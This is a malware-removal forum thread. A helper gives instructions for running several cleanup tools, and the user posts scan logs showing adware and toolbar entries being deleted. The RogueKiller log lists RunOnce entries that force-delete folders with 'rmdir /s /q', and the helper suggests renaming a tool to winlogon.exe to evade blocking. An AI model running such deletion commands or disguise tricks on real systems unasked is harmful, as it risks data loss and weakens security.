    2016-03-13 13:19 - 2016-03-13 13:19 - 00022537 _____ C:\Users\WELCOME\Desktop\FRST.txt
    2016-03-13 13:19 - 2016-03-13 13:19 - 00000000 ____D C:\FRST
    2016-03-13 13:17 - 2016-03-13 13:17 - 02374144 _____ (Farbar) C:\Users\WELCOME\Desktop\FRST64.exe
    2016-03-11 22:45 - 2016-03-11 22:45 - 00000000 ____D C:\Users\WELCOME\AppData\LocalLow\uTorrent
    2016-03-10 11:33 - 2016-03-13 01:30 - 00000973 _____ C:\Users\WELCOME\AppData\Roaming\vol.bat
    2016-03-10 11:33 - 2014-11-15 21:57 - 00001159 _____ C:\Users\WELCOME\AppData\Roaming\movie.bat
    2016-03-09 13:11 - 2016-03-09 13:20 - 00043167 _____ C:\Users\WELCOME\Documents\Tolerance Charts.pptx
    2016-03-07 17:19 - 2016-03-07 17:22 - 18976341 _____ C:\Users\WELCOME\Downloads\Vedalam - Aaluma Doluma Video _ Ajith Kumar _ Anirudh Ravichander.mp4
    2016-03-05 23:25 - 2016-03-05 23:25 - 00001106 _____ C:\Users\Public\Desktop\SoundWire Server.lnk
    2016-03-05 23:25 - 2016-03-05 23:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SoundWire Server
    2016-03-05 23:25 - 2016-03-05 23:25 - 00000000 ____D C:\Program Files (x86)\SoundWire Server
    2016-03-04 12:33 - 2014-03-25 18:45 - 00060400 _____ (Panda Security, S.L.) C:\Windows\system32\Drivers\PSKMAD.sys
    2016-03-02 19:11 - 2016-03-02 19:11 - 02763510 _____ C:\Users\WELCOME\Downloads\AlugGZOk9JOlIOSO1YSKNGdRDwvXPEcHdTaAboPG5vCN.mp4
    2016-03-02 19:04 - 2016-03-02 19:04 - 00174476 _____ C:\Users\WELCOME\Downloads\AoGLgA0pK7iTgAJqt8T4-6DN7IJ4ma5cbvA7wK1nzfYU.mp4
    2016-03-02 19:02 - 2016-03-02 19:02 - 01557550 _____ C:\Users\WELCOME\Downloads\Mr. Popo eats Kamehameha Wave.mp4
    2016-03-02 18:04 - 2016-03-02 18:04 - 00000000 ____D C:\Users\WELCOME\Documents\FFOutput
    2016-03-02 18:04 - 2016-03-02 18:04 - 00000000 ____D C:\Users\WELCOME\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FormatFactory
    2016-03-02 18:04 - 2016-03-02 18:04 - 00000000 ____D C:\Program Files (x86)\FreeTime
    2016-03-02 18:04 - 2002-12-06 11:32 - 00272896 _____ (Progressive Networks) C:\Windows\SysWOW64\pncrt.dll
    2016-03-02 17:59 - 2016-03-02 17:59 - 00000000 ____D C:\Users\WELCOME\Documents\NeroVideo
    2016-03-02 17:54 - 2016-03-02 17:54 - 00000000 ____D C:\Users\WELCOME\AppData\Roaming\8320
    2016-02-29 13:12 - 2016-02-29 13:16 - 12924386 _____ C:\Users\WELCOME\Downloads\Leonardo DiCaprio Wins The Oscar (HD) Best Actor.mp4
    2016-02-27 01:00 - 2016-02-27 01:00 - 00000000 ____D C:\Program Files (x86)\FreeAlarmClock
    2016-02-26 20:33 - 2016-02-29 18:19 - 00000000 ____D C:\Users\WELCOME\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    2016-02-26 20:32 - 2016-02-26 20:32 - 00000000 ____D C:\Users\WELCOME\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome
    2016-02-26 19:51 - 2016-02-26 19:54 - 28456560 _____ C:\Users\WELCOME\Downloads\Sachin - Vaadi Vaadi ( Tamil HD movie video songs 720p ).mp4
    2016-02-26 18:47 - 2016-02-26 18:56 - 23297419 _____ C:\Users\WELCOME\Downloads\Athichudi or Aathichudi Song HQ - TN 07 AL 4777 - DVD.mp4
    2016-02-16 17:37 - 2016-02-16 17:38 - 00000000 ____D C:\Users\WELCOME\AppData\Roaming\pim
    2016-02-16 15:50 - 2016-02-16 16:35 - 00000000 ____D C:\Program Files\Recuva
    2016-02-15 11:26 - 2016-02-15 11:27 - 00000000 ____D C:\Users\WELCOME\Desktop\Creo
    2016-02-14 15:56 - 2016-02-14 15:56 - 00655460 _____ C:\Users\WELCOME\Downloads\12692719_1043970192333271_904805262_n.mp4
    2016-02-13 23:59 - 2016-02-23 23:10 - 00000000 ____D C:\ProgramData\SP_FT_Logs

    ==================== One Month Modified files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-03-13 13:19 - 2015-10-19 15:57 - 00000000 ____D C:\ProgramData\Bitmeter2
    2016-03-13 12:37 - 2015-10-22 21:52 - 00000000 ____D C:\Users\WELCOME\Documents\AirDroid
    2016-03-13 12:35 - 2015-09-05 19:04 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
    2016-03-13 12:34 - 2009-07-14 10:15 - 00029168 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
    2016-03-13 12:34 - 2009-07-14 10:15 - 00029168 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
    2016-03-13 01:39 - 2016-01-01 08:42 - 00000000 ____D C:\Program Files (x86)\Wi-Fi
    2016-03-13 01:39 - 2015-12-31 14:54 - 00000432 _____ C:\Windows\system32\Drivers\etc\hosts.ics
    2016-03-13 01:13 - 2015-10-19 21:57 - 00000000 ____D C:\ProgramData\Panda Security URL Filtering
    2016-03-12 23:50 - 2015-09-05 21:25 - 00000000 ____D C:\Users\WELCOME\AppData\Roaming\vlc
    2016-03-12 21:12 - 2015-09-06 00:03 - 00000000 ____D C:\Users\WELCOME\AppData\Roaming\IDM
    2016-03-12 18:35 - 2015-09-05 19:04 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
    2016-03-12 08:00 - 2015-12-13 18:40 - 00000386 ____H C:\Windows\Tasks\{A0F80D69-4945-4230-AF59-AE70922D543C}.job
    2016-03-11 22:57 - 2015-09-06 00:03 - 00000000 ____D C:\Users\WELCOME\Downloads\Video
    2016-03-11 22:54 - 2009-07-14 08:50 - 00000000 ____D C:\Windows\system32\NDF
    2016-03-11 22:50 - 2016-02-07 19:32 - 00700612 _____ C:\Windows\system32\perfh007.dat
    2016-03-11 22:50 - 2016-02-07 19:32 - 00152388 _____ C:\Windows\system32\perfc007.dat
    2016-03-11 22:50 - 2009-07-14 10:43 - 01618320 _____ C:\Windows\system32\PerfStringBackup.INI
    2016-03-11 22:50 - 2009-07-14 08:50 - 00000000 ____D C:\Windows\inf
    2016-03-11 22:45 - 2015-12-03 20:43 - 00000000 ____D C:\Users\WELCOME\AppData\Roaming\uTorrent
    2016-03-11 22:45 - 2015-09-05 19:06 - 00000000 __SHD C:\Users\WELCOME\IntelGraphicsProfiles
    2016-03-11 22:44 - 2009-07-14 10:38 - 00000006 ____H C:\Windows\Tasks\SA.DAT
    2016-03-11 03:35 - 2015-09-06 00:03 - 00000000 ____D C:\Users\WELCOME\AppData\Roaming\DMCache
    2016-03-06 13:34 - 2015-09-06 00:03 - 00000000 ____D C:\Users\WELCOME\Downloads\Compressed
    2016-03-03 23:37 - 2015-12-12 18:09 - 00000000 ____D C:\Users\WELCOME\Downloads\Images
    2016-03-02 17:59 - 2015-09-05 21:23 - 00000000 ____D C:\Users\WELCOME\AppData\Local\Nero
    2016-03-02 17:59 - 2015-09-05 19:43 - 00000000 ____D C:\Users\WELCOME\AppData\Roaming\Nero
    2016-03-02 17:59 - 2015-09-05 19:39 - 00000000 ____D C:\ProgramData\Nero
    2016-03-02 17:47 - 2016-01-25 19:36 - 00000000 ____D C:\Windows\Minidump
    2016-02-28 13:02 - 2015-09-07 19:09 - 00000000 ____D C:\Users\WELCOME\AppData\Local\Sony
    2016-02-26 08:49 - 2015-12-19 12:00 - 00000000 ____D C:\Windows\rescache
    2016-02-23 17:46 - 2015-09-05 21:08 - 00000000 ____D C:\Users\WELCOME
    2016-02-23 15:56 - 2015-09-05 21:08 - 00000000 ____D C:\Users\WELCOME\AppData\Local\VirtualStore
    2016-02-20 16:37 - 2015-09-05 19:04 - 00002216 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
    2016-02-17 17:52 - 2009-07-14 10:38 - 00032620 _____ C:\Windows\Tasks\SCHEDLGU.TXT
    2016-02-16 15:50 - 2015-12-23 12:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Recuva
    2016-02-15 20:36 - 2016-01-14 23:44 - 00000000 ____D C:\Users\WELCOME\AppData\Local\Pushbullet
    2016-02-14 00:12 - 2015-10-22 21:51 - 00000000 ____D C:\Program Files (x86)\AirDroid

    ==================== Files in the root of some directories =======

    2016-03-10 11:33 - 2014-11-15 21:57 - 0001159 _____ () C:\Users\WELCOME\AppData\Roaming\movie.bat
    2015-11-16 18:27 - 2015-11-16 18:27 - 0012638 _____ () C:\Users\WELCOME\AppData\Roaming\UserTile.png
    2016-03-10 11:33 - 2016-03-13 01:30 - 0000973 _____ () C:\Users\WELCOME\AppData\Roaming\vol.bat
    2015-09-07 19:36 - 2015-10-19 23:48 - 0007597 _____ () C:\Users\WELCOME\AppData\Local\resmon.resmoncfg
    2016-02-07 13:17 - 2016-02-07 19:09 - 0002289 _____ () C:\ProgramData\hpzinstall.log

    Files to move or delete:
    ====================
    C:\Windows\Tasks\{A0F80D69-4945-4230-AF59-AE70922D543C}.job


    Some files in TEMP:
    ====================
    C:\Users\Guest\AppData\Local\Temp\cdo3470569912.dll


    ==================== Bamital & volsnap =================

    (There is no automatic fix for files that do not pass verification.)

    C:\Windows\system32\winlogon.exe => File is digitally signed
    C:\Windows\system32\wininit.exe => File is digitally signed
    C:\Windows\SysWOW64\wininit.exe => File is digitally signed
    C:\Windows\explorer.exe => File is digitally signed
    C:\Windows\SysWOW64\explorer.exe => File is digitally signed
    C:\Windows\system32\svchost.exe => File is digitally signed
    C:\Windows\SysWOW64\svchost.exe => File is digitally signed
    C:\Windows\system32\services.exe => File is digitally signed
    C:\Windows\system32\User32.dll => File is digitally signed
    C:\Windows\SysWOW64\User32.dll => File is digitally signed
    C:\Windows\system32\userinit.exe => File is digitally signed
    C:\Windows\SysWOW64\userinit.exe => File is digitally signed
    C:\Windows\system32\rpcss.dll => File is digitally signed
    C:\Windows\system32\dnsapi.dll => File is digitally signed
    C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
    C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


    LastRegBack: 2016-03-11 15:39

    ==================== End of FRST.txt ============================
     
  7. Broni

    Broni Malware Annihilator Posts: 52,898   +344

    [​IMG] Download RogueKiller from one of the following links and save it to your Desktop:

    Link 1
    Link 2
    • Close all the running programs
    • Windows Vista/7/8 users: right click on RogueKiller.exe, click Run as Administrator
    • Otherwise just double-click on RogueKiller.exe
    • Pre-scan will start. Let it finish.
    • Click on SCAN button.
    • Wait until the Status box shows Scan Finished
    • Click on Delete.
    • Wait until the Status box shows Deleting Finished.
    • Click on Report and copy/paste the content of the Notepad into your next reply.
    • RKreport.txt could also be found on your desktop.
    • If more than one log is produced post all logs.
    • If RogueKiller has been blocked, do not hesitate to try a few times more. If really won't run, rename it to winlogon.exe (or winlogon.com) and try again
    [​IMG] Please download Malwarebytes Anti-Malware (MBAM) to your desktop.
    NOTE. If you already have MBAM 2.0 installed scroll down.
    • Double-click mbam-setup-2.0.0.1000.exe and follow the prompts to install the program.
    • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
    • Click Finish.
    • On the Dashboard, click the 'Update Now >>' link
    • After the update completes, click the 'Scan Now >>' button.
    • Or, on the Dashboard, click the Scan Now >> button.
    • If an update is available, click the Update Now button.
    • A Threat Scan will begin.
    • When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
    • In most cases, a restart will be required.
    • Wait for the prompt to restart the computer to appear, then click on Yes.
    If you already have MBAM 2.0 installed:
    • On the Dashboard, click the 'Update Now >>' link
    • After the update completes, click the 'Scan Now >>' button.
    • Or, on the Dashboard, click the Scan Now >> button.
    • If an update is available, click the Update Now button.
    • A Threat Scan will begin.
    • When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
    • In most cases, a restart will be required.
    • Wait for the prompt to restart the computer to appear, then click on Yes.
    How to get logs:
    (Export log to save as txt)
    • After the restart once you are back at your desktop, open MBAM once more.
    • Click on the History tab > Application Logs.
    • Double click on the Scan Log which shows the Date and time of the scan just performed.
    • Click 'Export'.
    • Click 'Text file (*.txt)'
    • In the Save File dialog box which appears, click on Desktop.
    • In the File name: box type a name for your scan log.
    • A message box named 'File Saved' should appear stating "Your file has been successfully exported".
    • Click Ok
    • Attach that saved log to your next reply.
    (Copy to clipboard for pasting into forum replies or tickets)
    • After the restart once you are back at your desktop, open MBAM once more.
    • Click on the History tab > Application Logs.
    • Double click on the Scan Log which shows the Date and time of the scan just performed.
    • Click 'Copy to Clipboard'
    • Paste the contents of the clipboard into your reply.
    [​IMG] Please download AdwCleaner by Xplode onto your desktop.
    • Close all open programs and internet browsers.
    • Double click on adwcleaner.exe to run the tool.
    • Click on Scan button.
    • When the scan has finished click on Clean button.
    • Your computer will be rebooted automatically. A text file will open after the restart.
    • Please post the contents of that logfile with your next reply.
    • You can find the logfile at C:\AdwCleaner[S1].txt as well.
    [​IMG] Please download Junkware Removal Tool to your desktop.
    • Shut down your protection software now to avoid potential conflicts.
    • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
    • The tool will open and start scanning your system.
    • Please be patient as this can take a while to complete depending on your system's specifications.
    • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
    • Post the contents of JRT.txt into your next message.
     
  8. blackclaw96

    blackclaw96 TS Rookie Topic Starter

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Junkware Removal Tool (JRT) by Malwarebytes
    Version: 8.0.3 (02.09.2016)
    Operating System: Windows 7 Ultimate x64
    Ran by WELCOME (Administrator) on 14-03-2016 at 17:55:51.60
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




    File System: 30

    Failed to delete: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0PS72R2M (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_st.chatango.com_0.localstorage (File)
    Successfully deleted: C:\Users\WELCOME\AppData\Roaming\8320 (Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Roaming\opencandy (Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0PS72R2M (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2ES6ZSIS (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3BQFRYYE (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\41YW7VXN (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5MTIL98N (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6J48QQ88 (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\78CF3HIX (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9CG691KH (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A8XQX8M3 (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\C7A8E2TA (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NYWMIW52 (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YNFK1P0N (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZOM7WTXT (Temporary Internet Files Folder)
    Successfully deleted: C:\Windows\prefetch\FREEALARMCLOCK.EXE-08D6F59F.pf (File)
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2ES6ZSIS (Temporary Internet Files Folder)
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3BQFRYYE (Temporary Internet Files Folder)
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\41YW7VXN (Temporary Internet Files Folder)
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5MTIL98N (Temporary Internet Files Folder)
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6J48QQ88 (Temporary Internet Files Folder)
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\78CF3HIX (Temporary Internet Files Folder)
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9CG691KH (Temporary Internet Files Folder)
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A8XQX8M3 (Temporary Internet Files Folder)
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\C7A8E2TA (Temporary Internet Files Folder)
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NYWMIW52 (Temporary Internet Files Folder)
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YNFK1P0N (Temporary Internet Files Folder)
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZOM7WTXT (Temporary Internet Files Folder)



    Registry: 3

    Successfully deleted: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} (Registry Key)
    Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} (Registry Key)
    Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} (Registry Value)




    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Scan was completed on 14-03-2016 at 17:59:41.41
    End of JRT log
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
  9. blackclaw96

    blackclaw96 TS Rookie Topic Starter

    RogueKiller V12.0.2.0 [Mar 14 2016] (Free) by Adlice Software
    mail : http://www.adlice.com/contact/
    Feedback : http://forum.adlice.com
    Website : http://www.adlice.com/software/roguekiller/
    Blog : http://www.adlice.com

    Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
    Started in : Normal mode
    User : WELCOME [Administrator]
    Started from : E:\Malware\RogueKiller.exe
    Mode : Delete -- Date : 03/14/2016 18:14:54

    ¤¤¤ Processes : 0 ¤¤¤

    ¤¤¤ Registry : 20 ¤¤¤
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\SpeedBit -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} (C:\Program Files (x86)\pandasecuritytb\pandasecurityDx64.dll) -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar | {B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} : Panda Security Toolbar (C:\Program Files (x86)\pandasecuritytb\pandasecurityDx64.dll) -> Deleted
    [PUP] (X64) HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\URLSearchHooks | {B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} : (C:\Program Files (x86)\pandasecuritytb\pandasecurityDx64.dll) -> Deleted
    [PUP] (X86) HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\URLSearchHooks | {B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} : (C:\Program Files (x86)\pandasecuritytb\pandasecurityDx64.dll) -> ERROR [2]
    [PUP] (X64) HKEY_USERS\S-1-5-21-3006523739-2206101463-1198655294-1000\SOFTWARE\Microsoft\Internet Explorer\URLSearchHooks | {B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} : (C:\Program Files (x86)\pandasecuritytb\pandasecurityDx64.dll) -> Deleted
    [PUP] (X86) HKEY_USERS\S-1-5-21-3006523739-2206101463-1198655294-1000\SOFTWARE\Microsoft\Internet Explorer\URLSearchHooks | {B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} : (C:\Program Files (x86)\pandasecuritytb\pandasecurityDx64.dll) -> ERROR [2]
    [PUP] (X64) HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Internet Explorer\URLSearchHooks | {B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} : (C:\Program Files (x86)\pandasecuritytb\pandasecurityDx64.dll) -> ERROR [2]
    [PUP] (X86) HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Internet Explorer\URLSearchHooks | {B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} : (C:\Program Files (x86)\pandasecuritytb\pandasecurityDx64.dll) -> ERROR [2]
    [Suspicious.Path] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce | panda4_0dn_DATA_FOLDER : cmd.exe /c rmdir "C:\ProgramData\Panda Security URL Filtering" /s /q [7][x][x][-][x][x] -> Deleted
    [Suspicious.Path] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce | panda4_0dn_INSTALL_FOLDER : cmd.exe /c rmdir "C:\Windows\system32\config\systemprofile\AppData\Local\panda4_0dn" /s /q [7][x][x][x][x][x] -> Deleted
    [Suspicious.Path] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce | panda4_0dn_DATA_FOLDER : cmd.exe /c rmdir "C:\ProgramData\Panda Security URL Filtering" /s /q [7][x][x][-][x][x] -> ERROR [2]
    [Suspicious.Path] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce | panda4_0dn_INSTALL_FOLDER : cmd.exe /c rmdir "C:\Windows\system32\config\systemprofile\AppData\Local\panda4_0dn" /s /q [7][x][x][x][x][x] -> ERROR [2]
    [Suspicious.Path] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce | panda4_0dn_DATA_FOLDER : cmd.exe /c rmdir "C:\ProgramData\Panda Security URL Filtering" /s /q [7][x][x][-][x][x] -> ERROR [2]
    [Suspicious.Path] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce | panda4_0dn_INSTALL_FOLDER : cmd.exe /c rmdir "C:\Windows\system32\config\systemprofile\AppData\Local\panda4_0dn" /s /q [7][x][x][x][x][x] -> ERROR [2]
    [Suspicious.Path] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce | panda4_0dn_DATA_FOLDER : cmd.exe /c rmdir "C:\ProgramData\Panda Security URL Filtering" /s /q [7][x][x][-][x][x] -> ERROR [2]
    [Suspicious.Path] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce | panda4_0dn_INSTALL_FOLDER : cmd.exe /c rmdir "C:\Windows\system32\config\systemprofile\AppData\Local\panda4_0dn" /s /q [7][x][x][x][x][x] -> ERROR [2]
    [Hidden.From.SCM] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\tsusbhub (system32\drivers\tsusbhub.sys) -> Deleted
    [PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-3006523739-2206101463-1198655294-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0 -> Replaced (1)
    [PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-3006523739-2206101463-1198655294-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0 -> Replaced (1)

    ¤¤¤ Tasks : 0 ¤¤¤

    ¤¤¤ Files : 0 ¤¤¤

    ¤¤¤ Hosts File : 0 ¤¤¤

    ¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000036b]) ¤¤¤

    ¤¤¤ Web browsers : 1 ¤¤¤
    [PUP][FIREFX:Addon] kesxh4v3.default : Panda Security Toolbar [{B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4}] -> Deleted

    ¤¤¤ MBR Check : ¤¤¤
    +++++ PhysicalDrive0: ST1000DM003-1ER162 ATA Device +++++
    --- User ---
    [MBR] d5bd7dacebf2d312e12c63242945cfc5
    [BSP] 5933824af7494d253b6d5dab8701e3b6 : Windows Vista/7/8|VT.Unknown MBR Code
    Partition table:
    0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
    1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 204799 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
    2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 419635200 | Size: 204900 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
    3 - [XXXXXX] EXTEN-LBA (0xf) [VISIBLE] Offset (sectors): 839270400 | Size: 544068 MB
    User = LL1 ... OK
    User = LL2 ... OK

    +++++ PhysicalDrive1: StoreJet Transcend USB Device +++++
    --- User ---
    [MBR] ddf547eb6863598a573c735dc5272951
    [BSP] d04a347e27be8a97381534ecc5425b5c : Windows XP|VT.Unknown MBR Code
    Partition table:
    0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 64 | Size: 953867 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
    User = LL1 ... OK
    Error reading LL2 MBR! ([32] Die Anforderung wird nicht unterstützt. )
     
  10. blackclaw96

    blackclaw96 TS Rookie Topic Starter

    # AdwCleaner v5.102 - Logfile created 14/03/2016 at 18:19:51
    # Updated 13/03/2016 by Xplode
    # Database : 2016-03-14.1 [Server]
    # Operating system : Windows 7 Ultimate Service Pack 1 (x64)
    # Username : WELCOME - DIABLO
    # Running from : E:\Malware\adwcleaner_5.102.exe
    # Option : Clean
    # Support : http://toolslib.net/forum

    ***** [ Services ] *****


    ***** [ Folders ] *****

    [-] Folder Deleted : C:\Program Files (x86)\pandasecuritytb
    [-] Folder Deleted : C:\Program Files (x86)\Common Files\Speedbit
    [-] Folder Deleted : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk
    [J] Folder Not Deleted : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk
    [-] Folder Deleted : C:\Users\Guest\AppData\LocalLow\pandasecuritytb
    [-] Folder Deleted : C:\Users\Public\Documents\Speedbit
    [-] Folder Deleted : C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk
    [J] Folder Not Deleted : C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk
    [-] Folder Deleted : C:\Users\WELCOME\AppData\LocalLow\Speedbit
    [-] Folder Deleted : C:\Users\WELCOME\AppData\LocalLow\pandasecuritytb
    [-] Folder Deleted : C:\Users\WELCOME\AppData\Roaming\Mozilla\Firefox\Profiles\kesxh4v3.default\pandasecuritytb

    ***** [ Files ] *****

    [-] File Deleted : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_mallpejgeafdahhflmliiahjdpgbegpk_0.localstorage
    [#] File Deleted : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_mallpejgeafdahhflmliiahjdpgbegpk_0.localstorage
